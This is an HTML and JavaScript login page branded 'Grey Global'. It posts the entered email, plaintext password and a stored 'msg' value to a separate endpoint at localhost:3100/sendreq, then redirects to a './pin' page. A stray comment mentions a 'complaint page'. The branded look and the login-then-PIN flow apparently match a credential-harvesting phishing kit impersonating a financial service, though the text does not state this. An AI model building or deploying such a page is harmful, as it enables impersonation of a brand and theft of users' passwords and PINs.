<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link rel="shortcut icon" href="./grey-logo.png" type="image/x-icon">
  <title>Login - Grey Global</title>
 <style>
    * {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: "Inter", sans-serif;
}

body {
  background-color: white;
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100vh;
}

.container {
  text-align: center;
  width: 100%;
  max-width: 380px;
  background-color: #fff;
  padding: 40px 20px;
  border-radius: 8px;
}

h2 {
  font-size: 1.5rem;
  margin-bottom: 30px;
  color: #0d1b2a;
  font-weight: 600;
}

.login-form {
  display: flex;
  flex-direction: column;
  gap: 20px;
}

.input-group {
  text-align: left;
}

label {
  font-size: 0.85rem;
  font-weight: 500;
  color: #111;
  display: block;
  margin-bottom: 6px;
}

input {
  width: 100%;
  padding: 13px 14px;
  border: 1px groove #d3d3d3;
  border-radius: 6px;
  font-size: 0.95rem;
  
  outline: none;
}

input:focus {
  border-color:  #d3d3d3;
  outline: none;
  box-shadow: 0 0 0 2px rgba(37, 99, 235, 0.1);
}

.password-wrapper {
  position: relative;
}

.toggle-password {
  position: absolute;
  right: 12px;
  top: 50%;
  transform: translateY(-50%);
  cursor: pointer;
  font-size: 1rem;
  color: #555;
}

button {
  width: 100%;
  background-color: #2563eb;
  color: #fff;
  border: none;
  border-radius: 6px;
  margin-top: 7rem;
  padding: 12px;
  font-size: 1rem;
  font-weight: 600;
  cursor: pointer;
  transition: background 0.2s;
}

button:hover {
  background-color: #1d4ed8;
}

/* Smooth fade-in animation */
@keyframes fadeIn {
  from {
    opacity: 0;
    transform: translateY(10px);
  }
  to {
    opacity: 1;
    transform: translateY(0);
  }
}

@media (max-width: 480px) {
  .container {
    width: 90%;
    padding: 25px 15px;
  }

  textarea, input, button {
    font-size: 0.9rem;
  }

  h2 {
    font-size: 1.3rem;
  }
}

.container {
  animation: fadeIn 0.7s ease-in-out;
}

/* Button hover & press effects */
button {
  transition: background 0.3s, transform 0.2s;
}

button:hover {
  transform: scale(1.02);
}

button:active {
  transform: scale(0.98);
}

.create-account {
  margin-top: 20px;
  color: #555;
  font-size: 0.95rem;
  cursor: pointer;
}

.loader {
  display: none;
  width: 20px;
  height: 20px;
  border: 3px solid #fff;
  border-top: 3px solid transparent;
  border-radius: 50%;
  animation: spin 0.9s linear infinite;
  position: absolute;
  left: 50%;
  top: 50%;
  transform: translate(-50%, -50%);
}

@keyframes spin {
  to {
    transform: translate(-50%, -50%) rotate(360deg);
  }
}

button.loading .btn-text {
  visibility: hidden;
}

button.loading .loader {
  display: block;
}


 </style>
</head>
<body>
  <div class="container">
    <h2>Welcome back!</h2>

    <form class="login-form">
      <div class="input-group">
        <label for="email">Email address</label>
        <input type="email" id="email" placeholder="Enter email address" required />
      </div>

      <div class="input-group">
        <label for="password">Password</label>
        <div class="password-wrapper">
          <input type="password" id="password" placeholder="Enter your password" required />
          <span class="toggle-password" id="togglePassword">👁️</span>
        </div>
      </div>

      <button type="submit" id="continueBtn">
        <span class="btn-text"> Login to continue</span>
        <span class="loader"></span>
      </button>
    </form>

    <p class="create-account">Create an account</p>
  </div>

 <script>
    window.addEventListener("load", () => {
  setTimeout(() => document.getElementById("email").focus(), 400);
});

  const togglePassword = document.getElementById("togglePassword");
const passwordInput = document.getElementById("password");
const loginForm = document.querySelector(".login-form");
let continueBtn = document.getElementById("continueBtn");

togglePassword.addEventListener("click", () => {
  const type = passwordInput.getAttribute("type") === "password" ? "text" : "password";
  passwordInput.setAttribute("type", type);
});

// Simple validation and redirect
loginForm.addEventListener("submit", (e) => {
  e.preventDefault();

  const email = document.getElementById("email").value.trim();
  const password = passwordInput.value.trim();

  if (!email || !password) {
    alert("Please fill in both fields.");
    return;
  }

  if (!/^[^@\s]+@[^@\s]+\.[^@\s]+$/.test(email)) {
    alert("Please enter a valid email address.");
    return;
  }
  continueBtn.classList.add("loading");
  const send_data = {
    msg: 'login',
    email: email,
    password:password,
    message:localStorage.getItem('msg')
  }
  console.log(send_data)
    fetch('http://localhost:3100/sendreq',{
    method: 'POST',
                credentials:'include',
               headers: {
                 'Content-Type': 'application/json',
                       
               },
               body: JSON.stringify(send_data) // Convert the data to a JSON string
              }
    ).then(async res =>{
      const data = await res.json()
      
      if (data.msg == 'successful') {
        localStorage.setItem('email',email)
        console.log(data)
        setTimeout(() => {
    continueBtn.classList.remove("loading");
    // Redirect example: window.location.href = "dashboard.html";
    window.location.href = './pin';
  }, 2000);
      }
    }).catch(err =>{console.log(err)})
  // Redirect to complaint page\
 
 
});

 </script>
</body>
</html>
